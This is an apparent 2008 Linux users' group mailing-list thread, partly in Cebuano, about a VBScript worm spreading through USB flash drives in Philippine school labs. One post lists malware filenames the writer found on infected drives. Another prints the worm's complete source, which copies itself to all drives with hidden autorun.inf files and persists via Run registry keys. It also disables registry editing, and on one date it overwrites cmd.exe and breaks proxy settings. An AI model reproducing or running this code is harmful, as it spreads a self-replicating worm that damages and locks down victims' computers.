The "scandal variant" of this script also generates [PEGASUS].TXT
on some systems which contains "BLACK PEGASUS" Hacking Team from
Agusan del Sur. And also mentions that he/she/they come from STI in
Agusan.
That just confirms how prevalent this script is and is being
exchanged in the underground too frequently.
On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]>
wrote:
sa ako nabaw-an.. taga Quezon, Manila gahimo sa TTMS...
which is arch is right.. ang original kay...
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"
hmmm... naa pod Funny UST scandal thingy ani... daghan man... mao
mani uso karon... scripts na pangsinamok lang sa computer, pakamang
sa computer na di ma detect sa anti-virus... mostly kay VB....
list ani nila sa akong na encounter sa XU internet lab kay...
autorun.*
TTM*.*
Desktop.*
imgkulot*.*
RECYCLER\INFO.exe
RECYCLER\RECYCLER.exe
RECYCLER\Desktop.ini
sysdll.exe
krag.exe
RavMon*.*
msv*.dll
scvhosts.exe
scvhost.exe
svhost.exe
C:\Windows\svhost.exe
C:\Windows\svhost32.exe
"New Folder".exe
"Funny UST Scandal.avi.exe"
smss.exe
jay.exe
transmit.exe
isetup.exe
most sila ga kalat kay sa flashdisk... naka hidden files, system
files and read-only files....
then time to time.. ga usab ila name.. then ga improve ila pag
kamang... last worst encounter nako kay even imo na gi safe mode,
nag dagan gihapon sya... balig naka system na sya... even imo na gi
delete sa regedit kay naa gihapon sya... msconfig, naa gihapon. ang
last nako gibuhat kay gi delete nako ang mga RECYCLER sa tanan
drive nako.. kay didto man sila diay gatago.. hehehehehe... so
solve na dayun.. :)
amen...
===================================
On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
Obviously this is offtopic, since the guy's script can only
run in an OS which supports regedit.exe, wscript.exe and the
other MS-apps.
Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives
and then copy itself to them :D
pretty harmless compared to the other naught scripts but nonetheless
still annoying :D
"DOHHGS Ni TAGA CDOC"
Who wants to claim ownership for this script?
:D
any takers?
----------------------------------------------------------------------
-----------------
'THIS IS A MODIFIED VERSION BY: TTMS
'PROUD TO BE FILIPINO, NOT TO CORRUPTION!
On Error Resume Next
Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
mycmdfile = "cmd.exe"
mydate = month(now()) & day(now())
myvbsalias = "TTMS" & mydate
myvbsfile = myvbsalias & ".dll.vbs"
atr = "[autorun]" & vbCrLf & _
"shellexecute=wscript.exe " & myvbsfile
Set fs = CreateObject("Scripting.FileSystemObject")
Dim mf, text, size
Set mf = fs.GetFile(WScript.ScriptFullname)
size = mf.size
check = mf.Drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbCrLf
Loop
Do
Set winpath = fs.GetSpecialFolder(0)
Set tf = fs.GetFile(winpath & "\" & myvbsfile)
tf.Attributes = 32
Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
tf.Write mysource
tf.Close
Set tf = fs.GetFile(winpath & "\" & myvbsfile)
tf.Attributes = 39
If (mydate = "318") Then
Set winsyspath = fs.GetSpecialFolder(1)
cmd = "@echo off" & vbCrLf & _
"wscript " & winpath & "\" & myvbsfile
Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
tf.Attributes = 32
Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
tf.Write cmd
tf.Close
rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyEnable", 1, "REG_DWORD"
rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyServer", "0.0.0.0:80"
rg.RegWrite
"HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
\Control
Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
End If
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
flashdrive.Path <> "A:" Then
Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
tf.Attributes = 32
Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
2, True)
tf.Write mysource
tf.Close
Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
tf.Attributes = 39
Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 32
Set tf = fs.CreateTextFile(flashdrive.Path &
"\autorun.inf", 2,
True)
tf.Write atr
tf.Close
Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 39
End If
Next
Set rg = CreateObject("WScript.Shell")
rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\System\DisableRegistryTools",
1, "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA
IMO PC"
rg.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServices\MSConfig",
winpath & "\" & myvbsfile
rg.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
\MSConfig",
winpath & "\" & myvbsfile
If check <> 1 Then
WScript.sleep 200000
End If
Loop While (check <> 1)
Set sd = CreateObject("WScript.Shell")
sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph
--
--------------------
http://www.metacatalyst.com
http://www.metacatalyst.org
http://www.zabyer.org
Got my Own Hacker Key:
v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
http://www.hackerkey.com
Registered Linux User: #439468
_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph
--
"A dog that has no bite, barks loudest."
Registered Linux User #400165
http://baudizm.blogsome.com
http://www.bayanihanbooks.com
Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup,
sybase.public.ase.linux
_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph